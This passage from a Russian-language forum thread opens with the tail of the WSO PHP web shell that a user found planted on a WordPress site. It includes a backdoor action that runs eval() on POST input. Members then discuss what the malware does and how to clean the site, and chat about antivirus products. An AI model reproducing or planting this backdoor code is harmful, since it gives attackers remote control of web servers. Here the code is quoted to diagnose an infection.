  echo '<h1>Mail Test</h1><div class=content><table><form name=em onSubmit="g(null,null,\'ems\',this.mailto.value,this.usere.value);return false;"><tr><td><span>Send to</span></td>' . "<td><input type=text name=mailto value=><input type=hidden name=usere value=$user></td></tr>" . '<tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  if (isset($_POST['p1'])) {
      if ($_POST['p1'] == 'ems') {
          $from_add = $_POST['p3'] . "@" . php_uname('n');
          $to_add = $_POST['p2'];
          $subject = "Mail Test - $myurl";
          $message = "Test Message : " . $myurl;
          $headers = "From: Mail Test <$from_add>\r\n";
          $headers.= "Reply-To: $from_add\r\n";
          $headers.= "Return-Path: $from_add\r\n";
          $headers.= 'X-Mailer: PHP/' . phpversion();
          if (mail($to_add, $subject, $message, $headers)) {
              echo "Mail sent to $_POST[p2]";
          } else {
              echo "Error sending email!";
          }
      }
}
echo '</div><br>';
wsoFooter();
}

function actionRC() {
  if(!@$_POST['p1']) {
    $a = array(
      "uname" => php_uname(),
      "php_version" => phpversion(),
      "wso_version" => WSO_VERSION,
      "safemode" => @ini_get('safe_mode')
    );
    echo serialize($a);
  } else {
    eval($_POST['p1']);
  }
}
if( empty($_POST['a']) )
  if(isset($default_action) && function_exists('action' . $default_action))
    $_POST['a'] = $default_action;
  else
    $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  call_user_func('action' . $_POST['a']);
exit;
Еббаддь. Че-то дохуя букав. Можно предположить, что пароли тырит.
А эта хуйня запускается только если посетитель сайта в адресной строке наберет "wso1.php", или при загрузке любой страницы сайта?
По описанию "действия и фильтры на большинство хуков ВП" при загрузке любой страницы.
"ВП" - это вордпресс?
Да
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223344
Ханурик
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
XEugene  25.11.2022, 13:15
[игнорируется]
А так это хостинг ругается на стандартный функционал WordPress. Уязвимость в нём нашел. То есть, сам сайт, то есть его движок - это и есть вирус. Надо удалить.
Не, нихуа.

Будь это срабатывание на уязвимость движка - не было бы таких спецом запрятанных говноскриптов, которые я приводил выше.

Это может быть одно из двух: либо это какой-то хакнутый вордпресс со специально внедренной уязвимостью, либо вордпресс тут ни при чем, а хакерский скрипт внедрили на сам сайт.

А ругательство WP.Inject - скорее всего обозначает, что функционал хакерского скрипта нацелен прежде всего на сайты под вордпрессом.
...
Рейтинг: 1 / 0
Нравится: Владайка
Пэхапёбы есть?
    #223368
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Просто Трёп  25.11.2022, 09:27
[игнорируется]
Кроме того, интересно, что делает код. Там ведь кроме закодированной картинки и код есть.
а теперь Каспер не ругается на вирь в теме :))),
что-то из мессаг удалили?
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223431
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Гарыныч  25.11.2022, 13:44
[игнорируется]
Просто Трёп  25.11.2022, 09:27
[игнорируется]
Кроме того, интересно, что делает код. Там ведь кроме закодированной картинки и код есть.
а теперь Каспер не ругается на вирь в теме :))),
что-то из мессаг удалили?
Может, он различает вири для десктопов и вири для веб-серверов?
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223445
Логика
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[заблокирован]
Просто Трёп [игнорируется] 

Скорей всего вирус попал вместе с кодом на сайт, может в каких то левых скриптах.
Нужно будет проверять все файлы, многие подобные вирусы дописывают в скриптах код, который их снова восстанавливает и тд.
Часто это бывает из за не надёжного файл менеджера, которые сохраняют пароли.
Пароли лучше в системе не хранить.
...
Рейтинг: 1 / 0
Нравится: Владайка
Пэхапёбы есть?
    #223457
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Гарыныч  25.11.2022, 13:44
[игнорируется]
Просто Трёп  25.11.2022, 09:27
[игнорируется]
Кроме того, интересно, что делает код. Там ведь кроме закодированной картинки и код есть.
а теперь Каспер не ругается на вирь в теме :))),
что-то из мессаг удалили?
А что, ругался? Это просто ты на вторую страницу перешел.
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223458
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Просто Трёп  25.11.2022, 15:37
[игнорируется]
Гарыныч  25.11.2022, 13:44
[игнорируется]
Просто Трёп  25.11.2022, 09:27
[игнорируется]
Кроме того, интересно, что делает код. Там ведь кроме закодированной картинки и код есть.
а теперь Каспер не ругается на вирь в теме :))),
что-то из мессаг удалили?
А что, ругался? Это просто ты на вторую страницу перешел.
а терь ( на 2-й странице) опять ругается :(((
...
дед-пердед
Изменено: 25.11.2022, 15:41 - Гарыныч
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223459
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Просто Трёп  25.11.2022, 15:01
[игнорируется]
Гарыныч  25.11.2022, 13:44
[игнорируется]
Просто Трёп  25.11.2022, 09:27
[игнорируется]
Кроме того, интересно, что делает код. Там ведь кроме закодированной картинки и код есть.
а теперь Каспер не ругается на вирь в теме :))),
что-то из мессаг удалили?
Может, он различает вири для десктопов и вири для веб-серверов?
хз...
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223463
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
вот чо говорит :
Каспер ругается_2022-11-25_15-42-38.png
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223469
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
а на первую страницу пускает
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223527
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Ну все. Я заразил базефорум вирем.
[:biggrin2]
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223529
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
А какого хуя и каким хуем касперский анализирует содержимое ssl сессии?
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223532
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Просто Трёп  25.11.2022, 17:26
[игнорируется]
А какого хуя и каким хуем касперский анализирует содержимое ssl сессии?
хз..., я не пиздю....,
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223540
Фотография Буся
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 17:26
[игнорируется]
А какого хуя и каким хуем касперский анализирует содержимое ssl сессии?
он готовое анализирует уже расшифрованное на стороне клиента
...
хвост есть продолжение кошки
Рейтинг: 1 / 0
Нравится: Гарыныч
Пэхапёбы есть?
    #223560
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Буся  25.11.2022, 17:31
[игнорируется]
Просто Трёп  25.11.2022, 17:26
[игнорируется]
А какого хуя и каким хуем касперский анализирует содержимое ssl сессии?
он готовое анализирует уже расшифрованное на стороне клиента
Читает с диска кэш браузера? Или использует документированные возможности браузеров? Или недокументированные?
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223639
Фотография Буся
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 17:48
[игнорируется]
Буся  25.11.2022, 17:31
[игнорируется]
Просто Трёп  25.11.2022, 17:26
[игнорируется]
А какого хуя и каким хуем касперский анализирует содержимое ssl сессии?
он готовое анализирует уже расшифрованное на стороне клиента
Читает с диска кэш браузера? Или использует документированные возможности браузеров? Или недокументированные?
вообще то оно от админа работает,и напрямую читает не только сетевую сессию через loopback но и все операции ввода вывода иначе как проверять контент по другому
...
хвост есть продолжение кошки
Изменено: 25.11.2022, 18:51 - Буся
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223644
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Буся  25.11.2022, 18:47
[игнорируется]
не только сетевую сессию через loopback
На этом уровне все еще ssl.
Буся  25.11.2022, 18:47
[игнорируется]
все операции ввода вывода
А если браузер все держит в ОЗУ?
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223652
Фотография Буся
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 18:53
[игнорируется]
Буся  25.11.2022, 18:47
[игнорируется]
не только сетевую сессию через loopback
На этом уровне все еще ssl.
Буся  25.11.2022, 18:47
[игнорируется]
все операции ввода вывода
А если браузер все держит в ОЗУ?
а что оперативка не доступна уже стала руту?
...
хвост есть продолжение кошки
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223670
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Доступна, конечно. Но как-то это неправильно.
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223674
Фотография Буся
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 19:05
[игнорируется]
Доступна, конечно. Но как-то это неправильно.
а как еще от зловредов защищаться только полный контроль, у меня доктор web например когда iso шник разворачиваешь на флешку, то налету грохает инфицированное бесит пипец,зачастую под инфицированным принимает всякие полезные утилиты хитрые
...
хвост есть продолжение кошки
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223684
Просто Трёп
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Буся  25.11.2022, 19:09
[игнорируется]
Просто Трёп  25.11.2022, 19:05
[игнорируется]
Доступна, конечно. Но как-то это неправильно.
а как еще от зловредов защищаться только полный контроль, у меня доктор web например когда iso шник разворачиваешь на флешку, то налету грохает инфицированное бесит пипец,зачастую под инфицированным принимает всякие полезные утилиты хитрые
Тут-то как раз мониторинг файловых операций. Это норм. Я тоже, пока не снес дрвеба, постоянно заебывался вносить каталоги и диски в исключения. А что с виндовым дефендером? Он вообще мышей ловит? Давно про него ничего не слышал. Как-то он тихо себя ведет.
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223688
Испытатель диванов
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 19:29
[игнорируется]
А что с виндовым дефендером? Он вообще мышей ловит?
нормально, можно на вин10 убирать сторонние антивирусы
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223702
Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Испытатель диванов  25.11.2022, 19:37
[игнорируется]
Просто Трёп  25.11.2022, 19:29
[игнорируется]
А что с виндовым дефендером? Он вообще мышей ловит?
нормально, можно на вин10 убирать сторонние антивирусы
это МакАффе ? кажись его купил Микрософт?
...
дед-пердед
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223717
Фотография Буся
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 19:29
[игнорируется]
Буся  25.11.2022, 19:09
[игнорируется]
Просто Трёп  25.11.2022, 19:05
[игнорируется]
Доступна, конечно. Но как-то это неправильно.
а как еще от зловредов защищаться только полный контроль, у меня доктор web например когда iso шник разворачиваешь на флешку, то налету грохает инфицированное бесит пипец,зачастую под инфицированным принимает всякие полезные утилиты хитрые
Тут-то как раз мониторинг файловых операций. Это норм. Я тоже, пока не снес дрвеба, постоянно заебывался вносить каталоги и диски в исключения. А что с виндовым дефендером? Он вообще мышей ловит? Давно про него ничего не слышал. Как-то он тихо себя ведет.
говорят норм вроде
...
хвост есть продолжение кошки
Рейтинг: 0 / 0
25 сообщений из 57, страница 2 из 3
Форумы [новые:1] / Просто Трёп [закрыт для гостей] [новые:1] / Пэхапёбы есть?
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (1): Анонимы (1)
Игнорируют тему (1): erbol 
Читали форум (19): Анонимы (8), sergey11, Ибрагимов Мага 82, Green, Брюквенные годы 1 мин., паразит 1 мин., basename 1 мин., s62 3 мин., Ветер 3 мин., Sparrow 4 мин., cat2 8 мин., Tabula Rasa 9 мин.
Пользователи онлайн (25): Анонимы (11), Yandex Bot, sergey11, Ибрагимов Мага 82, Green, Bing Bot, Брюквенные годы 1 мин., паразит 1 мин., basename 1 мин., s62 3 мин., Ветер 3 мин., Sparrow 4 мин., erbol 7 мин., Мару 8 мин., cat2 8 мин.
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]